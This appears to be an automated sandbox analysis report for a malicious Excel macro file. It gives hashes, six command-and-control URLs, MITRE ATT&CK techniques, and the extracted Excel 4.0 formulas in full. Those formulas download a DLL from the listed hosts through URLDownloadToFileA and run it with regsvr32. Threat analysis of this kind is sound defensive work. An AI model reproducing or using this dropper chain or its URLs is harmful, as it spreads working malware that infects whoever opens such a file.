Overview

overview

10

Static

static

10

VJX8874787...m.xlsm

windows7-x64

10

VJX8874787...m.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    VJX88747877189xlsm.xlsm

  • Size

    46KB

  • Sample

    230701-jgblcsha9t

  • MD5

    94effc0e0771b71bad4593c9430fe67b

  • SHA1

    4aa62a4efbb8c02b145fe5db3c0873ac0fe275c4

  • SHA256

    989afb22d889ef10aefc7185c5a8d051fa3dd6c0f2a6a811c1a89498e293b615

  • SHA512

    30c83fa06219cc8c0365d1f8487a3591e0cf2ac90e92019b8ccdb018f0711349b273c12dc5fa69ecc23c9c06d8e367ca72e5c6747987ff43b2b5229b76e86892

  • SSDEEP

    768:cmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:dBlntTEvDLmXi3JvG6YzATOJnXYSXRM

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://eles-tech.com/css/KzMysMqFMs/

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

https://txpcrescue.com/cgi-bin/5tSO8/

http://hadramout21.com/jetpack-temp/Py/

http://haribuilders.com/zoombox-master/4HYGX/

http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://eles-tech.com/css/KzMysMqFMs/","..\xewn.dll",0,0) =IF('PIMKE'!C14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/","..\xewn.dll",0,0)) =IF('PIMKE'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://txpcrescue.com/cgi-bin/5tSO8/","..\xewn.dll",0,0)) =IF('PIMKE'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hadramout21.com/jetpack-temp/Py/","..\xewn.dll",0,0)) =IF('PIMKE'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://haribuilders.com/zoombox-master/4HYGX/","..\xewn.dll",0,0)) =IF('PIMKE'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hansen-arnal.com/cp/iiTrAeEtvOwmjjekWgI/","..\xewn.dll",0,0)) =IF('PIMKE'!C24<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://eles-tech.com/css/KzMysMqFMs/
xlm40.dropper

http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/

Targets

    • Target

      VJX88747877189xlsm.xlsm

    • Size

      46KB

    • MD5

      94effc0e0771b71bad4593c9430fe67b

    • SHA1

      4aa62a4efbb8c02b145fe5db3c0873ac0fe275c4

    • SHA256

      989afb22d889ef10aefc7185c5a8d051fa3dd6c0f2a6a811c1a89498e293b615

    • SHA512

      30c83fa06219cc8c0365d1f8487a3591e0cf2ac90e92019b8ccdb018f0711349b273c12dc5fa69ecc23c9c06d8e367ca72e5c6747987ff43b2b5229b76e86892

    • SSDEEP

      768:cmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:dBlntTEvDLmXi3JvG6YzATOJnXYSXRM

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks